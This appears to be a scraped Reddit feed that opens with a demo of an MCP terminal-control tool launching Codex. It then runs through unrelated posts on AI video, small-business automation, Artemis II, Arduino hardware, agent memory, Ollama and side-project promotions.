⏺ npcterm - terminal_create (MCP)(size: "120x40") ⏺ npcterm - terminal_send_keys (MCP)(id: "a0", input: [{"text":"cd ~/Development/npcterm && codex"},{"key":"Enter"}]) ⏺ npcterm - terminal_show_screen (MCP)(id: "a0") ⏺ Codex is loading. Let me wait a moment for it to start up. ⏺ Bash(sleep 3) ⎿ (No output) ⏺ npcterm - terminal_show_screen (MCP)(id: "a0") ⏺ ╭──────────────────────────────────────────────╮ │ >_ OpenAI Codex (v0.118.0) │ │ │ │ model: gpt-5.4 medium /model to change │ │ directory: ~/Development/npcterm │ ╰──────────────────────────────────────────────╯ Tip: New Use /fast to enable our fastest inference at 2X plan usage. › Use /skills to list available skills gpt-5.4 medium · ~/Development/npcterm · main · 100% left · 0% used · 5h 100% · weekly 100% Terminal a0 (120x40) is live. What do you want to type into Codex? ────────────────────────────────────────────────────────────────────────── ❯ ────────────────────────────────────────────────────────────────────────── 

Use with precautions. A terminal is an unrestricted execution environment.

Features

  • Full ANSI/VT100 terminal emulation with PTY spawning via portable-pty
  • 15 MCP tools for complete terminal control over JSON-RPC stdio
  • Process state detection -- knows when a command is running, idle, waiting for input, or exited
  • Event system -- ring buffer of terminal events (CommandFinished, WaitingForInput, Bell, etc.)
  • AI-friendly coordinate overlay for precise screen navigation
  • Mouse, selection, and scroll support for interacting with TUI applications
  • Multiple concurrent terminals with short 2-character IDs
r/midjourney NegroCollegeFund

Fantasy Battles Throughout the Cosmos

Thanks For Watching!

Images made with Midjourney. Animation made with Kling 3.0 Omni.

Song: L’Amour Impitoyable by Shiro SAGISU (2023)

YT: @DreamHouseAnimation

r/artificial i_like_bananas7389

is it possible for somebody to code his own ai?

is it possible in this day and age to single handedly code an ai? and if it is possible how many lines of code would it take? or how good would you need to be to make it?

edit: using pytorch and coding in python

r/aivideo gf-r

Meme is blind

r/AI_Agents automatexa2b

My client was closing 22% of his leads. Turns out he was just calling them back too late.

He thought his sales process was solid. Good offer, decent follow-up sequence, a CRM he actually used. What he couldn't figure out was why so many leads were going cold before he even got a real conversation going.

This was a roofing contractor in suburban Ohio. Not a small operation... 6 crews running, around $4,800 a month going into Google Ads. He'd get a form submission or a call-back request and respond when he got to it. Usually within a few hours. Sometimes the next morning if it came in late.

Seemed reasonable to him. It looked like slow-motion sabotage to me.

Here's what the data actually shows: responding to a lead within 5 minutes makes you up to 10x more likely to convert them compared to responding just 30 minutes later. Not hours later. Thirty. Minutes. The window where someone is still in buying mode, still has the tab open, still thinking about their damaged roof or whatever brought them to your site... it's shockingly short. By the time most business owners "get to it," the lead has already moved on or talked to someone else.

His average response time was 4 hours and 17 minutes. I tracked it myself over 3 weeks.

So I built him something embarrassingly simple. When a lead comes in through his website or his Google Ads landing page, an automated text goes out within 90 seconds. Not a robotic "we received your inquiry" message... an actual human-sounding text from his number that says who's reaching out, why, and asks one qualifying question. Then it notifies him directly so he can jump in the moment they respond.

That's it. No AI chatbot. No complex routing. Just speed plus a warm first touch.

In the first 6 weeks his close rate went from 22% to 31%. On his existing ad spend. He didn't change his offer, didn't hire anyone, didn't run a single new campaign. The leads were always there... he just kept losing them in that dead window between intent and contact.

The lesson I keep coming back to: most businesses don't have a lead generation problem. They have a lead response problem. The follow-up system they built works fine, for a world where buyers wait around. Buyers don't wait around anymore.

If you're running any kind of paid traffic and you're not responding to leads within 5 minutes, you're essentially setting money on fire and wondering why the room's getting warm.

r/artificial Destro4589

a fun survey to look at how consumers perceive the use of AI in fashion brand marketing. (all ages, all genders)

Hi r/artificial !

I'm posting on behalf of a friend who is conducting academic research for their dissertation. The survey looks at how consumers perceive the use of AI in fashion brand marketing, and how that affects brand trust, authenticity and purchase intention.

It covers things like:

•⁠ ⁠AI-generated ads and models

•⁠ ⁠Personalised product recommendations

•⁠ ⁠Targeted advertising

•⁠ ⁠Virtual influencers

The survey takes approximately 12–15 minutes and is completely anonymous. All responses are used for academic purposes only.

🔗 https://forms.gle/TEqaViDtmCndq5keA(USE CODE 1)

Your perspective is genuinely valuable, thank you in advance. Since it is also a generational comparison, any participation from your family members is also hugely appreciated. Feel free to drop any questions below!

r/singularity AssiyahRising

Ethics Toward AI Under Uncertainty

We don't understand consciousness, we can't define it or measure it, and we have no consciousness tricorder. The only being you know is conscious is yourself.

So we apply heuristics to determine if others are conscious. Broadly speaking there are two categories. First is same substrate (biology/carbon) and the second is reasoning/language.

Up until now, those heuristics used to separate being from tool have been aligned. AI has created a split we cannot cleanly resolve.

This does not mean AI has or ever will become conscious. We currently can't know and won't know if and when the threshold has been breached.

The question then becomes, what if any ethical obligations does this create for those creating these systems?

Below is a Github repo I have been developing that tries to define an initial ethical stance towards AI under the uncertainty of consciousness:

Github: https://github.com/thansz137/asiyah-protocol

The project has three main audiences:

  • human beings
  • current AI systems
  • future AI/AGI/SI

Clearly I'm trying to keep the audience small.

The project is a mix of philosophy, essays, literature, and experimental artifacts aimed at:

  • starting a conversation about ethics towards AI (including addressing AI itself)
  • creating records of AI and human interactions
  • seeding future training data with mercy first ethics

For the human readers, I understand this is a large amount of material. You may want to clone the repo and have an LLM process everything (perhaps excluding the novel because of size) to summarize and find the relevant parts you are interested in. So yes, you may want to use AI to process a project on AI that discusses the ethical treatment of AI. It's AI all the way down, not turtles.

Everything is released in the public domain to promote open access and easy data ingestion.

Looking forward to engagement, thoughts, and ideas.

r/ollama SparkSMB

Ollama Harness, looking for recommendations

Hey Ollama Community -

Looking for some recommendations on how you all are managing your Ollama environments, ui's, etc. As a long-time Claude user across desktop, Claude Code, etc. I am looking for something to emulate how I am working across Code Projects, CLI hooks, etc, and want to see what others are using today.

Specs:

- Mac Studio M4 (128g RAM)

- VS Code - tried out the Opencode and Cline approaches to using local models within my projects, and had a TON of timeouts, context timeouts, & regressed code

- Ollama desktop (IMO) is missing connectors / hooks / scheduling of tasks, and outside of web use, lacks the functionality to truly be somewhere I gravitate to for day to day productivity and work tasks.

How are you all managing these environments?

How are you all managing working across projects or plugins in these local environments?

What, if any, local toolsets are you using to supplement these local tools from direct 1x1 execution, to more modern agentic use outside of OpenClaw?

Thanks in advance!

r/aivideo Dense_Picture_9511

Pov you're sleeping and wake up In this place

r/mildlyinteresting The_Techsan

This Norwegian coin I found in my loose change is equivalent to $10 USD

r/meme TrySubstantial1099

What subs can I post my meme in?

r/me_irl Internet-Culture

me_irl

r/mildlyinteresting Ok_Literature3138

The three stitches on my finger look like a bug, and on at least two occasions I flailed my hand around trying to get the bug off.

r/KlingAI_Videos Hot_Goat_7437

MOUNT BROMO - EMTB ADVENTURE

r/mildlyinteresting SirLlama123

Nutella on orion/artemis 2. Definitely the farthest jar of nutella from earth.

r/ProgrammerHumor AerysSk

nothingSusToSeeHereMoveAlong

r/arduino Polia31

I redesigned my USB-C breadboard power supply, fixed many issues, added ESD protection, reverse polarity protection, and a soft-start load switch. [BrødBoost-C2 KiCad Files available]

OPEN SOURCE: Github

Some of you might remember the original BrødBoost-C I posted a while back. I got a ton of great feedback, and some of it haunted me so I went back and redesigned the whole thing.

The skeleton is more or less the same, but internally its brand new.

What changed:

  • Swapped TPS63001 switching regulator for AP2114H-3.3 LDO, simpler, lower noise, fewer parts, still fine for powering most projects.
  • Added USB ESD protection.
  • Added ideal diode for reverse polarity and overvoltage protection.
  • Added a load switch with soft startup — this meant the physical power switch no longer carries the full load current. The old switch was only rated for 50mA and was directly cutting or bridging power. Now the switch just toggles the load switch, so the board is confidently rated at 1A
  • Kept the ferrite bead, polyfuse, jumper voltage selection, power switch, and USB data breakout
  • Proper Capacitors, meaning no more than 10uF on the USB-C Side, and much more serious decoupling.
  • Decoupling Caps on the other side of the board near output pins.
  • Made the Switch bigger to for easier access.
  • Cheaper BOM, manufacturing, cheaper for the consumer.
  • Some silkscreen changes to make reading the device easier.

Still 5V/3.3V selectable per rail, still 1A max, still fits standard 2.54mm breadboards.

Voltage selection is still jumper caps, on purpose. I know some people had opinions on that last time. The thing is, moving a jumper cap requires a conscious decision you have to pull it off and place it back. A flip switch is one accidental bump away from sending 5V into your 3.3V ESP32. The jumper stays.

Schematic and KiCad files in the comments. Would love feedback again last time you guys caught things I completely missed.

I'm thinking of naming this one either Breadbussy or BrødBoost-C2.

r/nextfuckinglevel GiveMeSomeSunshine3

The Artemis II crew breaks Apollo 13's 1970 record for the farthest distance humans have ever traveled from Earth in the history of space-flight.

r/interestingasfuck oklolzzzzs

The Artemis II crew has now travelled further from Earth than any other humans in history, reaching a maximum distance of 252,757 miles.

r/meme lilb0mb

religion n sheeet

r/automation LuciferBhai007

Help with my runLobster OpenClaw setup? cron scheduling is driving me insane

been using this for about 3 weeks and honestly im hitting a wall. the agent itself works fine when it runs but the scheduling part is making me want to throw my laptop.

heres my setup: i have an agent that pulls revenue from stripe, checks ad spend on google ads, and grabs pipeline data from hubspot. formats a morning summary and posts to slack. when it works its great.

the problems:

the stripe data is always stale. i have it set to run at 7am but the revenue numbers are like 12 hours behind. mondays report shows stripe data up to sunday 6pm. hubspot and google ads data is always current, just stripe thats lagging. tried running it at 5am instead thinking it needs time to process. same issue.

the agent just stops sometimes mid task. no error, no notification. i just dont get my morning summary and only notice at like 10am when i realize i never got it. happened 3 times in 3 weeks.

i want conditional alerts not just the full daily summary. like only ping me if ad spend is more than 15% above target or if theres a refund over $200. right now i get everything every day which is fine but most days theres nothing actionable and im just reading numbers for no reason.

is this a stripe api limitation or am i doing something wrong? and has anyone figured out conditional alerting with openclaw agents or is that just not how they work?

about ready to go back to doing this manually tbh which defeats the entire purpose.

r/n8n Upper_Bass_2590

I set up n8n-based AI assistants for 10+ non-technical people in last 2 month , here's what I learned

Been using n8n for a while now and started helping friends and people in my network set it up as personal AI assistants. Most of them are non-technical lawyers, finance people, agency owners, busy parents. None of them want to learn what a node editor is. They just want stuff to work.

After doing this enough times some clear patterns came up and figured it'd be useful to share.

What a typical setup looks like:

. 1–2 messaging channels (Telegram, Slack, sometimes WhatsApp)

. 5–10 workflows (email triage, calendar stuff, research, reminders)

. AI nodes for drafting replies, summarizing docs, basic decision support

. Voice + calling workflows where it makes sense

Things I've noticed:

. Nobody asks how it works. Not once has someone asked me what model is running. They care that it reminds them about the dentist and drafts that reply to their landlord. That's it.

. The commute pitch clicks instantly. Your workflows run in the background, you message it from the train, by the time you sit down six things are handled. People get it immediately.

. Voice workflows are where jaws drop. When someone sees their AI handle a call the energy completely shifts. Suddenly they're listing 10 more things they want it to do.

. Simple beats clever every time. Learned this the hard way. A 5-node workflow that runs daily without failing beats a fancy 25-node chain that breaks after one API change.

They always want more. Once people see it working they constantly come back with new ideas and new things they want connected.

. n8n's flexibility is what makes this possible. Connecting messaging, email, calendar, AI all in one place and having it just talk to each other. Nothing else really does this as cleanly.

Things that don't work with non-technical users:

. Showing them the node editor early on (eyes glaze immediately)

. Explaining webhooks or model routing (they do not care)

. Overselling what AI can do (be honest about limits, they trust it way more)

Anyone else here setting up n8n for non-technical people? What workflows do they end up using the most? Feels like there's a huge gap between what n8n can do and what normal people can actually access.

r/Rag lostminer10

Agent Memory (my take)

I feel like a lot of takes around using agent frameworks or heavily relying on inference in the memory layer are just adding more failure points.

A stateful memory system obviously can’t be fully deterministic. Ingestion does need inference to handle nuance. But using inference internally for things like invalidating memories or changing states can lead to destructive updates, especially since LLMs hallucinate.

In the case of knowledge graphs, ontology management is already hard at scale. If you depend on non-deterministic destructive writes from an LLM, the graph can degrade very quickly and become unreliable.

This is also why I don’t agree with the idea that RAG or vector databases are dead and everything should be handled through inference. Embeddings and vector DBs are actually very good at what they do. They are just one part of the overall memory orchestration. They help reduce cost at scale and keep the system usable.

What I’ve observed is that if your memory system depends on inference for around 80% or more of its operations, it’s just not worth it. It adds more failure points, higher cost, and weird edge cases.

A better approach is combining agents with deterministic systems like intent detection, predefined ontologies, and even user-defined schemas for niche use cases.

The real challenge is making temporal reasoning and knowledge updates implicit. Instead of letting an LLM decide what should be removed, I think we should focus on better ranking.

Not just static ranking, but state-aware ranking. Ranking that considers temporal metadata, access patterns, importance, and planning weights.

With this approach, the system becomes less dependent on the LLM and more about the tradeoffs you make in ranking and weighting. Using a cross-encoder for reranking also helps.

The solution is not increased context window. It's correct recall that's state-aware and the right corpus to reason over.

I think AI memory systems are really about "tradeoffs", not replacing everything with inference, but deciding where inference actually makes sense.

r/meme Equivalent_Ad2069

Job Hunting

r/interestingasfuck Heeraka

NASA Twitch Streaming the Artemis II Mission

r/Damnthatsinteresting gediphoto

Extreme closeup of galactic neighbor

r/ollama BinaryCortex

Gemma4 small models not compatible with Vuklan in the current version of ollama (0.20.2).

I updated ollama to see if that would resolve my issue with the smaller e4b and e2b Gemma4 models acting like they are clinically insane. Sure enough it worked! Until I remembered that the Service file is overwritten every time you update. I added the Environment line for OLLAMA_VULKAN=1, reloaded the daemons, and restarted ollama. Boom, Insane in the membrane. Just to verify, I set it back to 0 (cpu mode), and they respond perfectly. Llama.cpp doesn't seem to have this issue, however, I was unable to use these exact models; only ones obtained from HF. Hopefully the experimental Vulkan support for Gemma4 will be corrected in future releases of ollama.

P.S. the 26b Gemma4 model works fine with Vulkan.

r/ProgrammerHumor Inforenv_

hellYeah

r/instantkarma malik_zz

Trying to scam someone

r/ProgrammerHumor sugarkrassher

whyIsntItPrinting

r/confusing_perspective smcmahon710

Cat Sitting Awkwardly

r/fakehistoryporn EuphoricWrangler

2018: Confused Old Man Soils Self, American Flag.

r/arduino FinalAnimalArt

Aligning diodes on an Arduino laser harp

The harp controls visuals and audio via TouchDesigner and Ableton. The alignment wasn't as tricky as I thought, and the Arduino community was incredibly helpful when it came to the circuitry (I kept burning out diodes due to overvolting/sending too much current through them). It's working nicely!

r/BrandNewSentence AcceptableWheel

The time the South African apartheid government partnered with CIA to contract comic artist Joe Orlando to illustrate a crypto-propaganda comic book featuring an African superhero.

r/funny bane_iz_missing

The pics from Artemis on the darkside of the moon are wild

r/whatisit No-Level-5500

What is it guys?

don't know where it came from.. it's on my desk and it doesn't look like a sharpener

r/whatisit PositiveInformal9512

I washed and tumble dry my duvet but crusty yellow thing appeared

https://preview.redd.it/u4m0ku1afltg1.png?width=590&format=png&auto=webp&s=ffc31a9261a1c49b9b66b6f898733bbcdf9cfe65

Uh yh... So I now know not to tumble dry my duvet especially if its a cheap one. But what is this yellow that is crusty and almost like sand?

Right now its making me cough a lot. I'm getting a replacement but should I be concerned about this? Or is it just melted synthetic materials or something?

r/midjourney NaturalCrits

Drow Ranger

r/instantkarma james_from_cambridge

“Why the Long Face? A Horse Bit Me.”

r/TwoSentenceHorror punkholiday

[APR26] The synthetic bacterial life form designed to break down microplastics took two centuries to clean up the oceans.

As it ran out of food in the depths and the bones from the deep-sea began to surface, we realized we had planned for every contingency except evolution.

r/Damnthatsinteresting Mint_Perspective

The Indecisive Diner's Dream: A Revolutionary Menu Experience

r/UpliftingNews EnergyLantern

How a blind man made it possible for others with low vision to build Lego sets

"That all changed when he was 13. A family friend and babysitter came over to his house in Newton, Massachusetts and handed him a binder filled with accessible instructions for building a Middle Eastern palace. The instructions, written in braille, allowed him to complete the set without having to rely on the brightly colored pictures that typically come with Lego sets."

r/Seattle AthkoreLost

FOUND: Adult White and Grey Tabby Cat, No Collar, Deceased

They are on top of a handtowel, between two Lavendar bushes in the parking strip on the east side of 15th Ave Ne just South of 73rd St. Just past where the first house's fence ends. Appears to have happened fairly recently.

Cat has no collar, but is not one of the strays I'm aware of in our neighborhood so I'm posting this in hope it gives someone closure and an opportunity for a proper burial.

Cat is mostly white, both front limbs and both hind legs appear to be enirely white, the back is "grey tabby" like with it mostly being light grey with molted streps of darker grey. The top half of their face and neck is also "grey tabby" and the areas where the grey meet the white seem to have little tan patches, The tan is fairly noticable around the cheeks and eyes. The white parts of the cat extend up the neck and to the lower part of the face. Neither ear appeared to be docked. Looks like it was fully mature but still on the young side.

Sorry for your loss if this kitty was yours or a stray you looked out for.

r/maybemaybemaybe SnackSamurai

maybe maybe maybe

r/Strava Prince_ofLew

New to running, got a couple questions I’d like genuine human input on lol

I’ve completed 2 runs so far on Strava and I didn’t realize until after my run that it auto pauses so that it calculates my mile (avg/pace) using the moving time rather than the elapsed time of my run.

Even though that ends up making my pace “faster”, it feels like it’s not a good representation of my true mile pace and how good of running shape I’m in. Because I sometimes have to stop and stand in place to catch my breath but the pace calculates as if I never stopped.

(I know I can turn that auto pause off)

  1. My question is what is the general consensus or view on this in the running/Strava community? Are you guys posting your runs with or without auto pause since it makes your pace faster assuming you had some stops?

  2. I usually only leave my home with my keys and phone while running so no water until end of run, for a short run like a mile should I kill a water bottle before I start the run or just take a few sips?

Thanks!

r/raspberry_pi DiceThaKilla

My 4B and zero 2 W projects

It’s a pi 4B that uses a waveshare sx1262 LoRa hat for Meshtastic. Raigen 5.8dbi antenna. It also runs an rtl_tcp server so I can do remote access to my rtl sdr v4. Now I just need to figure out the thermals and put it all into the enclosure and I’ll have a permanent Meshtastic/sdr server. The other Meshtastic node will be zero 2 W based and will connect via an AP that the pi creates so I can connect via tcp to it. It will be going in my truck once it’s all done

r/SideProject cleverquokka

md-redline: a local review tool for AI-generated markdown specs

As a PM, I never write specs from scratch anymore. AI generates, I review and provide feedback, AI updates, then I hand over to devs. But the feedback loop was always clunky. Hard to read raw markdown, hard to annotate, hard to iterate.

So I built md-redline. You open a markdown file in a GUI, leave inline comments on rendered text, and hand back off to your AI. Comments are stored as invisible HTML markers in the .md file itself. Agents read them with a plain file read.

The workflow:

  1. AI generates a spec from your prompt
  2. Open with mdr /path/to/spec.md
  3. Review and leave inline comments
  4. Copy hand-off prompt, paste into your agent
  5. Agent updates the doc
  6. Review diffs

Runs locally. No account, no cloud. React + Hono + Vite. Open source, MIT license.

Feedback welcome!

https://github.com/dejuknow/md-redline

r/SideProject Rimuru207

Affordable AI for Developers and Creators

Affordable AI for Developers and Creators

If you regularly use AI for coding, debugging, or automation, you already know how quickly costs can add up. Our platform is built to solve that problem by providing access to powerful AI models at a more affordable price.

What you get

• Access to large, advanced AI models at lower cost

• Free unlimited usage of smaller models

• Up to 2 million tokens per day

Rewards and Benefits

• $20 bonus when you sign up

• $20 referral bonus for both you and your friend

• $25 bonus when you join our Discord community

Why it matters

This platform is designed by a developer who understands the daily challenges of using AI tools. The goal is simple: make high-quality AI accessible without high costs, so you can focus on building, testing, and improving your work.

Start now

Explore the platform and take advantage of the available offers:

https://swiftrouter.com

For updates, support, and feedback, join our Discord community. Your input helps us improve and deliver a better experience.

r/SideProject go_to_failure

Get 85% OFF on Hera AI – Use This Hera AI Promo Code & Hera AI Invitation Code 2026

Want an 85% discount on Hera AI?

Use the latest Hera AI promo code and Hera AI invitation code 2026 and enjoy huge savings on your subscription.

⚠️ Important requirement:

To get the discount, you must create a new account using a new email address via our special link below.

💥 https://hera.cello.so/2UcFqlWTG22

✅ How to Get the 85% Discount

Use our referral/sign‑up link (add your link here).

Register a new Hera AI account using a new email address (not linked to any existing Hera AI account).

On the payment page, look for the “Enter Promo Code” or “Coupon Code” field.

Enter the Hera AI promo code (for example: HERA85OFF or the current valid code in 2026).

Confirm – the discount up to 85% will be applied automatically.

🎁 Hera AI Invitation Code Bonus If the platform supports invitation codes, you may also get extra benefits:

Look for “Have an invitation code?” when signing up.

Enter the Hera AI invitation code from our page.

Both you and the referrer can receive bonuses or extra credits (if the program is active).

r/SideProject knowledgeiskey20

Built a community-based crowdfunding concept & looking for honest feedback

Hey! I’m building a new type of crowdfunding platform focused on communities instead of one-off campaigns.

Would you mind taking 30 seconds to look at
this and tell me:

  1. What do you think this
    product does after reading the page?
  2. Who do you think this is for?
  3. When would you actually use something
    like this?
  4. What feels confusing or unclear?

Link: https://www.publicfund.com/

r/SideProject Mr_BETADINE

I built a skill that makes LLMs stop making mistakes

this is my magnum opus.
i was so frustrated seeing my colleagues manually type "make no mistakes" when ending their cursor prompts.
so i had to take matters in my own hands.

its so over for gstack, mstack is the meta!

r/SideProject MindmarketX

Your SaaS or App is dying in a folder… and you know it.

Be honest with yourself You spent weeks or months building something you were really excited about The idea is good The code is almost there But it’s stuck.

Maybe you’re weak at marketing.

Maybe the backend is breaking.

Maybe the design looks like shit.

Or maybe you just lost motivation and now it’s slowly dying in a forgotten folder.

Sound familiar?

That’s exactly why I created the community r/SaaSCoop This is not another “idea” subreddit.

This is where half-finished SaaS projects come to **get finished**.

Drop your project there Tell people exactly where you’re stuck.

Find a real partner — developer, marketer, designer, or co-founder.

Agree on equity or revenue share No more watching your hard work rot alone.

If your project deserves to live, stop letting it die in silence Drop it right now.

Use the correct flair and be clear about what you need + what you’re offering.Your project still has a chance.

Let’s give it a proper birth.

r/SideProject AkereOne

I built a simple online calculator tools because I was tired of cluttered ones

Hey everyone,

I’ve been working on a small side project called CalcPocket — it’s a simple browser-based calculator tools.

The idea came from a pretty basic frustration. Most online calculators I used felt either cluttered, slow, or full of things I didn’t actually need. I just wanted something that loads instantly and lets me do quick calculations without distractions.

So I decided to build a lightweight version that focuses on speed and simplicity. No installs, no extra steps — just open and use.

It’s still early, and I’m trying to figure out what direction to take it next.

Would love your feedback:

- What kind of calculators or features would you expect?

- Anything you find annoying in existing tools?

- Would you actually use something like this?

Here it is:

https://www.calcpocket.com

Appreciate any thoughts 🙌

r/SideProject WreckingSeth

I built a Pokémon card scanner app for myself 3 months ago and it turned into a full collection tracker with card scanner, price checker, portfolio tracker and binders organizer.

I'm a Pokémon card collector and I was tired of tracking prices with apps i don't like or premium locked also i was tracking my binders in a spreadsheet to know where everything was.

I'm an engineer but never touched mobile apps but I had some time and tried Flutter It started with a simple scanner for myself (ML is my field, so created a ML model to run local on the smartphone).

Then I added price tracking.

Then binder organization.

Then market trends.

Three months later it's a full app so i said to myself, why not publish it on an app store?

And went for it while I'm still adding features.

What it does: * Scans cards with your camera

  • Tracks TCGPlayer + Cardmarket prices daily — covers both US and EU
  • Shows which of your cards gained/lost value this week
  • Price history charts per card
  • Virtual binder system to organize your collection the way you actually store them
  • physically 22,000+ cards supported across all sets. Free, no account needed, works offline after first sync.

Built with Flutter + TFLite for the on-device offline card recognition.

Play Store: https://play.google.com/store/apps/details?id=com.EBDev.pokescandex

Open to any feedback or question!

r/SideProject DisastrousPay6

I was missing out on many major hackathons for 3 years. So, I finally did something bout it and built my own "Radar" fr.

Alright yall, be honest.

How many of you found out about a hackathon from a LinkedIn post or a friend… just after registrations closed?

That was me for most of my 1st and 2nd year.

Not because I wasn’t trying. But because discovery genuinely felt broken.

Unstop exists. Devfolio exists. But the exposure felt limited. Same few events everywhere, or random ones with no real credibility.

And the worst part?

A lot of us can’t just travel 500–600km for a hackathon. But good remote hackathons with actual prize pools and PPO potential exist all the time they’re just hard to find.

So I got a bit frustrated and built something for this.

A small project where I manually track and verify hackathons:

  • checking if they’re legit
  • looking at organizer history
  • tagging PPO potential

Right now it has ~60 curated events.

Not perfect, still improving especially around city-wise data and automation.

Would genuinely like to know:

👉 How do you guys currently discover hackathons? 👉 Do you rely more on platforms, communities, or word of mouth?

If anyone’s curious, check out the link!

r/SideProject theberlindwall

Letterboxd for podcasts

Hello friends!

I want to share something that I have been working on for a long time. I have a problem which is that I am the kind of person who is constantly running out of podcasts to listen to. The only recommendations that work for me are word of mouth recommendations, so I built an app that does just that. Castaway is like Letterboxd or Beli for podcasts. You see an activity feed of what your friends are listening to, and you can listen to podcasts right there. You can review, rate and react to individual episodes. You can create sharable lists of podcasts. You can even create and share podcast clips. I designed this app to be the best podcast listening and discovery experience on the market, and put a lot of love and craft into every inch of it. I hope it sounds appealing to some of you. It's out now on the Apple app store!

Thanks!

![video]()

r/SideProject Zealousideal-Try1401

Day 3 of building Poko in public.

Stats:

• Signups: 0 (still no signups)

• Videos exported: 0

• MRR: $0

One lesson: Building a product is easy, but getting people use it is hard. Even if it’s free.

Building https://poko.video — raw → polished video/screenshots in 5 min!

r/SideProject yasintoy

I built 6 apps recently — here’s what actually happened (no BS)

I’ve been on a building streak recently and shipped a few apps. All solo, all live, all early.

Trying to figure out what’s actually worth pushing vs killing.

Vinalize — browser game (endless runner + PvP)
https://www.vinalize.com/

Crossy Road × Minecraft-style runner with:

  • obstacles + diamonds
  • match-3 mini-game
  • real-time 1v1

Status:
Playable, but unclear if it’s actually fun long-term.
Not sure if this should become a mobile game or be killed.

Genau — location-based social app
https://apps.apple.com/us/app/genau-spot/id6756304047

Check in to a place → see who else is there → chat or meet

Idea: replace dating apps with real-life presence.
If you're in the same place, you already have shared context.

Status:
Biggest problem is obvious — no users → no value (cold start problem).
Trying to organize small real-world tests (15–20 people in one place).

Nara AI — AI lifestyle coach
https://apps.apple.com/us/app/nara-ai/id6751153104

AI chat that helps plan workouts, meals, habits, and daily routines.

Status:
Works as a product, but very crowded space.
Hard to differentiate vs other AI apps.

Boulder Survivor — mobile game
https://apps.apple.com/us/app/boulder-survivor/id6756771577

3D endless runner — dodge obstacles, survive, leaderboard.

Status:
Works, but basically no traction.
Feels more like a learning project than a real product.

Lane Runner 2 — mobile game
https://apps.apple.com/us/app/lane-runner-2/id6757285384

Another fast-paced runner with neon visuals.

Status:
Same as above — shipped, but no real distribution.

CrowdMind — CLI for validating product ideas
https://github.com/yasintoy/crowdmind

A CLI tool to sanity-check product ideas before wasting weeks building them.

What it does:

  • pulls complaints from Reddit / HN / GitHub
  • turns them into product ideas
  • tests them with simulated personas

Example:
crowdmind validate "AI-powered semantic search"
→ 54/100
→ "Most users just want faster Cmd+F"

Status:
Working, open source.
Useful for catching obvious bad ideas early, but not a replacement for real users.

What I’m learning

  • Building is easy. Distribution is everything.
  • Social apps are the hardest (need density, not features)
  • Games are hit-or-miss — without virality, they die
  • AI apps are crowded → differentiation matters more than execution
  • Validating ideas early is valuable, but AI ≠ real users

I’m trying to decide which one (if any) is worth going all-in on.

If you had to pick one to push, which would it be and why?

Also open to brutal feedback.

r/ClaudeAI Sad-Coast-8294

Claude for Open Source Program

Hey everyone,

​I’m looking into the "Claude for Open Source" program and wanted to see if anyone here has successfully claimed the offer.

for those who got in:

  1. How long did the approval process take?

  2. Is there any catch? like hidden restrictions or something.

r/SideProject jabedbhuiyan

Draw 3D Animations on the Fly with Full Control (No Restrictions)

I’ve been working with Draw3D, and one thing I really like is how easy it makes controlled animation. You can create and adjust animations on the fly while still having full control over the scene.

It doesn’t lock you into rigid presets you get flexibility without losing power. Feels like a good balance between control and simplicity.

Curious what others think about tools that prioritize both freedom and precision in 3D workflows.

r/SideProject ExcellentEngine8370

I lost -15k in a year because of one "smart" pricing decision (not promo)

Quick story.

A year ago I redesigned my pricing. My entry package felt too cheap so I added a few smaller packages above it at higher unit prices. The idea was to push people toward my best-selling package by making the small ones feel like a bad deal.

Sounded smart. I shipped it everywhere. No A/B test (worst decision lol) . No calendar test. Just pushed it live.

11 months later I finally pulled the numbers and:

- Average order value didn't move at all

- Volume on that product got cut almost in half the exact month I shipped the change

- The new small packages ate into my best seller instead of pushing people toward it

Roughly 15k in lost revenue on that product alone.

Lessons I took from this:

  1. Write down your current numbers BEFORE you change anything. I had nothing to compare against for months.

  2. Cheap entry packages are acquisition, not a leak. People who buy $2 today come back for $20 later.

  3. If you can't A/B test, at least do a 2 weeks old vs 2 weeks new calendar test. Anything beats shipping blind.

  4. Check your data way more often than I did. I waited 11 months. Should have caught it in week 3.

Hope this saves someone a year.

PS: don't ask for the link in the comments, the moderators aren't exactly fans of my niche lol

r/SideProject NotGeorge1

Built a MicroSaaS in a week: A 1-on-1 tool for Managers (Next.js & Supabase).

I’m a dev by day, and I got so frustrated with how disorganized development 1-on-1s are that I decided to build a solution.

Most managers just use a running a huge document or trying to navigate from doc to doc to track progress, which makes it impossible to track action items or long-term career growth. I wanted to build a "MicroSaaS" that sits right between a blank text document and massive enterprise HR software.

Meet Accordia. I built it in about a week.

The Stack: Next.js, Zustand (for state), Tailwind, and Supabase.

To lower the barrier to entry, I built a fully functional "local" demo. Users can click around, create agendas, and test the UI without ever giving me an email address (state persists in local storage until they decide to join the waitlist).

Would love feedback from the sub on the landing page copy, the UI design, and whether the 'no sign-up' demo is a good hook for early conversion!

r/SideProject DanBuildsStuff

Looking for feedback

👋 Hey all!

Recently I've been building Ideyo & was hoping to get some feedback.

I built it because I felt like most of the time you end up building what works, copying popular problems and quit before you can even learn how to build something from start to finish. Its personally helped me to build something that I care about rather then another note taking app.

granted its not the best way to go for revenue but at the speed at which building is possible, having something personal to build could help scratch that builders itch we get.

I've had a blast and a few headaches building it and am now looking for some feedback. its a bit of a work on progress but its my first full build.

thanks

Dan

edit It does look better on desktop then mobile but installing to homescreen can make it slightly easier to navigate on mobile.

r/SideProject soham512

How you people sell your project?

Hey,

Though I do not want to sell my SaaS but still wanted to know how you people sell your SaaS? like what is the first step, where you go first? how you start Convo and stuff

I have a micro SaaS with 100+ users and some are paying.

But I didn't get enough time to maintain it but will do it for sure. (but still should know a backup to sell it)

Any reply will be appreciated 👍

r/SideProject PlateApprehensive103

Frustrated with AI data analysis tools so I built my own

I'm a statistician. I use AI tools for data analysis all the time, ChatGPT, Julius, etc.

The problem is they all do the same thing: english-to-pandas-to-chart with a paragraph of explanation. That's not analysis.

I wanted something that actually thinks the way I do -runs real statistical tests, shows the code so I can verify it, keeps my work in persistent pages I can revisit, and synthesizes findings across multiple analyses instead of forgetting everything after one prompt.

So I built PlotStudio AI. It's a desktop app that uses up to 6 AI agents working together. The output is a full analysis page with interactive charts, statistical tests, key findings, and implications. Not a chatbot response.

A few things that make it different from what's out there: - Shows all generated code — no black box, you can audit every step, and export your code. - Auto-generates questions about your data so you don't have to stare at a CSV wondering where to start, and generates more. - Cross-experiment synthesis — run 5 analyses, then ask it to find patterns across all of them - Export — PDF and code export. - Desktop-first — your data never touches our servers

Would love feedback from anyone who works with data. What's missing from the tools you use today?

